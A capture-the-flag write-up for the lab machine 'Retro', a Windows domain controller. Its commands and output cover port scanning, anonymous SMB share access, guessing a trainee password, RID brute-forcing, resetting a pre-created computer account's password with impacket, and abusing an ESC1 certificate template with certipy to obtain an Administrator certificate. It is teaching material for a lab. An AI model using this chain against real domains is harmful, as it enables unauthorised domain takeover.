Retro
Retro
Writeup
Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
nmap -sCV 10.129.117.252 --open
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-24 19:25:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after: 2025-10-02T10:33:09
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after: 2025-10-02T10:33:09
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after: 2025-10-02T10:33:09
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-10-02T10:33:09
|_Not valid after: 2025-10-02T10:33:09
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: RETRO
| NetBIOS_Domain_Name: RETRO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: retro.vl
| DNS_Computer_Name: DC.retro.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-06-24T19:26:11+00:00
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2025-04-08T01:55:44
|_Not valid after: 2025-10-08T01:55:44
|_ssl-date: 2025-06-24T19:26:50+00:00; -1s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
We can see port SMB is openned, so let check that.
1
2
3
4
5
6
7
8
9
10
11
12
13
nxc smb 10.129.117.252 -u '.' -p '' --shares
SMB 10.129.117.252 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.117.252 445 DC [+] retro.vl\.:
SMB 10.129.117.252 445 DC [*] Enumerated shares
SMB 10.129.117.252 445 DC Share Permissions Remark
SMB 10.129.117.252 445 DC ----- ----------- ------
SMB 10.129.117.252 445 DC ADMIN$ Remote Admin
SMB 10.129.117.252 445 DC C$ Default share
SMB 10.129.117.252 445 DC IPC$ READ Remote IPC
SMB 10.129.117.252 445 DC NETLOGON Logon server share
SMB 10.129.117.252 445 DC Notes
SMB 10.129.117.252 445 DC SYSVOL Logon server share
SMB 10.129.117.252 445 DC Trainees READ
We can read content in Trainees share
1
smbclient //10.129.117.252/Trainees -N
Download Important.txt file and view its content. We can see username maybe trainee and password is very likely something easily remembered by a bunch of people. Try the username as the password.
User Flag
1
2
3
4
5
6
7
8
9
10
11
12
13
sudo crackmapexec smb 10.129.117.252 -u trainee -p trainee --shares
SMB 10.129.117.252 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.129.117.252 445 DC [+] retro.vl\trainee:trainee
SMB 10.129.117.252 445 DC [*] Enumerated shares
SMB 10.129.117.252 445 DC Share Permissions Remark
SMB 10.129.117.252 445 DC ----- ----------- ------
SMB 10.129.117.252 445 DC ADMIN$ Remote Admin
SMB 10.129.117.252 445 DC C$ Default share
SMB 10.129.117.252 445 DC IPC$ READ Remote IPC
SMB 10.129.117.252 445 DC NETLOGON READ Logon server share
SMB 10.129.117.252 445 DC Notes READ
SMB 10.129.117.252 445 DC SYSVOL READ Logon server share
SMB 10.129.117.252 445 DC Trainees READ
We can read more Notes share.
Download user.txt to get our first flag.
Root Flag
1
nxc smb 10.129.117.252 -u 'trainee' -p 'trainee' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print $2}' | awk '{print $1}' > users.txt
We know the name of the old machine account that has pre-windows-2000 compatibility (Brute force the RIDs of domain objects using netexec. The account name ends with $.)
We need to change password for that username. Read this for more information: Diving into Pre-Created Computer Accounts
1
2
3
4
5
6
7
wget https://raw.githubusercontent.com/fortra/impacket/a1d0cc99ff1bd4425eddc1b28add1f269ff230a6/examples/rpcchangepwd.py
python3 rpcchangepwd.py retro.vl/BANKING\$:banking@10.129.117.252 -newpass 123
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies
[*] Password was changed successfully.
Read this for more info ESC1: Abusing Active Directory Certificate Services
1
2
3
4
5
6
7
Templates vulnerable to ESC1 have the following configurations:
Client Authentication: True
Enabled: True
Enrollee Supplies Subject: True
Requires Management Approval: False
Authorized Signatures Required: 0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
certipy find -u 'BANKING$' -p '123' -dc-ip 10.129.117.252 -vulnerable -enabled
Certificate Authorities
0
CA Name : retro-DC-CA
DNS Name : DC.retro.vl
Certificate Subject : CN=retro-DC-CA, DC=retro, DC=vl
Certificate Serial Number : 7A107F4C115097984B35539AA62E5C85
Certificate Validity Start : 2023-07-23 21:03:51+00:00
Certificate Validity End : 2028-07-23 21:13:50+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : RETRO.VL\Administrators
Access Rights
ManageCertificates : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
ManageCa : RETRO.VL\Administrators
RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
Enroll : RETRO.VL\Authenticated Users
Certificate Templates
0
Template Name : RetroClients
Display Name : Retro Clients
Certificate Authorities : retro-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Permissions
Enrollment Permissions
Enrollment Rights : RETRO.VL\Domain Admins
RETRO.VL\Domain Computers
RETRO.VL\Enterprise Admins
Object Control Permissions
Owner : RETRO.VL\Administrator
Write Owner Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Dacl Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
Write Property Principals : RETRO.VL\Domain Admins
RETRO.VL\Enterprise Admins
RETRO.VL\Administrator
[!] Vulnerabilities
ESC1 : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
1
2
3
certipy req -u 'BANKING$' -p '123' -dc-ip 10.129.117.252 -ca 'retro-DC-CA' -target 10.129.117.252 -template 'RetroClients' -upn 'Administrator@retro.vl' -key-size 4096
certipy auth -pfx administrator.pfx